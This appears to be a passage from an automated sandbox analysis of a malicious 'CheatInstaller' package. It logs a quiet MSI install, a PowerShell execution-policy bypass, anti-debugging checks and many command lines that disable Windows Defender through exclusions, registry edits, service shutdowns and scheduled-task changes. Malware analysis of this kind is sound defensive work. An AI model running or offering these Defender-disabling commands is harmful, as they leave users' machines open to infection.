Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\lib
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

Process token adjusted: Debug

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Modifies Windows Defender protection settings

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\opensource\cheatinstaller 2.32\install\e957a1c\yttstcheat.msi" /quiet ai_setupexepath=c:\users\user\appdata\local\temp\7zs8c89.tmp\install_yttchts.exe setupexedir=c:\users\user\appdata\local\temp\7zs8c89.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1711662176 " allusers="1"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssc38a.ps1" -propfile "c:\users\user\appdata\local\temp\msic368.txt" -scriptfile "c:\users\user\appdata\local\temp\scrc369.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrc36a.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\opensource\cheatinstaller 2.32\install\e957a1c\yttstcheat.msi" /quiet ai_setupexepath=c:\users\user\appdata\local\temp\7zs8c89.tmp\install_yttchts.exe setupexedir=c:\users\user\appdata\local\temp\7zs8c89.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1711662176 " allusers="1"

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Queries volume information: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
